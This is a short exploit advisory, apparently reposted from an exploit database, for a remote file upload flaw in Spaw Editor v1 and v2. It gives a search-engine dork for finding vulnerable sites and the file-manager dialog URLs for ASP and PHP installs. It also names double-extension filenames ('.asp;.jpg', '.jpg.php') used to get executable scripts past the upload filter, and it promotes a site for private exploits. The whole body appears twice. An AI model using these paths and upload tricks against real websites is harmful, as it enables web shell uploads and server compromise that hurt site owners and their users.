# Tilte: Spaw Editor v1.0 & 2.0 Remote File Upload .
# Date………………..: [20-05-2010]
# Author………………: [Ma3sTr0-Dz]
# Location ……………: [Algeria]
# Software ……………: [Spaw Editor v1 & v2]
# Impact………………: [Remote]
# Site Software ……….: [http://www.spaweditor.com]
# Sptnx ………………: [CmOs_Clr & Sec4ever Memberz.]
# Home : ……………..: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8
Exploits !]
# Contact me : ………..: [o5m@hotmail.de] # Vulnerability: Remote File Upload .
# Part ExplOit & Bug Codes : Dork [ allinurl:spaw2/dialogs/ ]
Exploit : For Windows & ASP Sites :
/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images
/spaw2/uploads/files/sec4ever.asp;.jpg
=====================================
For Linux PHP :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files
/spaw2/uploads/files/sec4ever.jpg.php
=====================================
sumber : exloit-db
# Date………………..: [20-05-2010]
# Author………………: [Ma3sTr0-Dz]
# Location ……………: [Algeria]
# Software ……………: [Spaw Editor v1 & v2]
# Impact………………: [Remote]
# Site Software ……….: [http://www.spaweditor.com]
# Sptnx ………………: [CmOs_Clr & Sec4ever Memberz.]
# Home : ……………..: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8
Exploits !]
# Contact me : ………..: [o5m@hotmail.de] # Vulnerability: Remote File Upload .
# Part ExplOit & Bug Codes : Dork [ allinurl:spaw2/dialogs/ ]
Exploit : For Windows & ASP Sites :
/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images
/spaw2/uploads/files/sec4ever.asp;.jpg
=====================================
For Linux PHP :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files
/spaw2/uploads/files/sec4ever.jpg.php
=====================================
sumber : exloit-db